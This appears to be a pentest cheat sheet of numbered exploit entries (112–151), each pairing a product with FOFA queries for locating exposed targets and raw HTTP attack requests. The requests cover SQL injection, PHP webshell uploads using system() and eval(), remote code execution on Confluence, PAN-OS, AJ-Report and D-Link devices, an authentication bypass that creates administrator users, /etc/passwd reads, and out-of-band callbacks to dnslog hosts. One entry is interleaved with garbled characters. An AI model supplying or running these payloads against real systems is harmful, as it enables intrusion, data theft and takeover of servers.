User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


1 ^& M( P$ E: W6 j2 M& Z117. WordPress LayerSlider插件SQL注入
D$ h4 H- `2 o! R M4 T& [version:7.9.11 – 7.10.0
f2 A5 e1 k/ J$ v0 _0 |* w3 wFOFA:body="/wp-content/plugins/LayerSlider/"
$ M3 ^) o6 B3 A t& H2 mGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
/ `: C) R$ M: c2 y' f {Host: your-ip+ r7 V& Y6 v* k0 H$ x% t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ k4 o( J: @8 j& [* ^ [" F) {! gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) b' Z9 G" ?7 D7 A' k2 e: }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ u. W$ B- P* W' U- o
Accept-Encoding: gzip, deflate, br
0 f" B8 w* f. A& K% `# m8 H9 oConnection: close
- A$ s z( j7 W: ] ?1 i+ J. cUpgrade-Insecure-Requests: 1' F2 F) U0 Q I" {' N4 Y, w5 I2 z- U
6 p. Y9 G3 L: A- _6 b1 p
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"


-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA: title="Smart管理平台"
The sql parameter is base64-encoded (encoding, not encryption): c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The output of the command is returned in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed from there.
126. aiohttp path traversal
FOFA: title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the path exactly as written: a client that normalizes dot segments before sending (most browsers, curl without --path-as-is) will collapse it to /etc/passwd and the check gives a false negative.

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA: body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS query for the dnslog hostname confirms that the server resolved the external entity (out-of-band XXE); the response body itself need not change.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA: app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, passing the uuid obtained in step 1 in the uuid request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA: icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
Time-based payload in the orderBy parameter (the response is delayed 3 s when the database name is 11 characters long):
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA: body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a user with the SYSTEM_ADMIN role without any credentials; the jsp=...;.jsp query string is what defeats the authentication check.

CVE-2024-27199 (path traversal to authenticated pages)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py
133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA: body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

The injection point is the IPAddr field inside the JSON; updatexml() leaks the database version in the resulting error message.

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA: title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立迅) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA: body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA: body="/808gps/"
Credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA: app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id); passwd is likewise base64 (YWJjMTIzNDVjYmE decodes to abc12345cba).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

The SESSID value creates a file under the device telemetry minute directory whose name contains the backtick command; the command runs when the telemetry job processes that directory, so the dnslog callback is delayed rather than immediate.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA: app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url is base64 (cnRzcDovL2EK decodes to rtsp://a); transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA: title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ path suffix is what bypasses authentication; validationRules is evaluated server-side by a JavaScript engine that exposes Java classes, hence java.lang.ProcessBuilder.

151. AJ-Report 1.4.1 pageList SQL injection
FOFA: title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The request shown reaches the endpoint without authentication via the /;swagger-ui/ prefix; the SQL injection payload for pageList itself is not reproduced here.

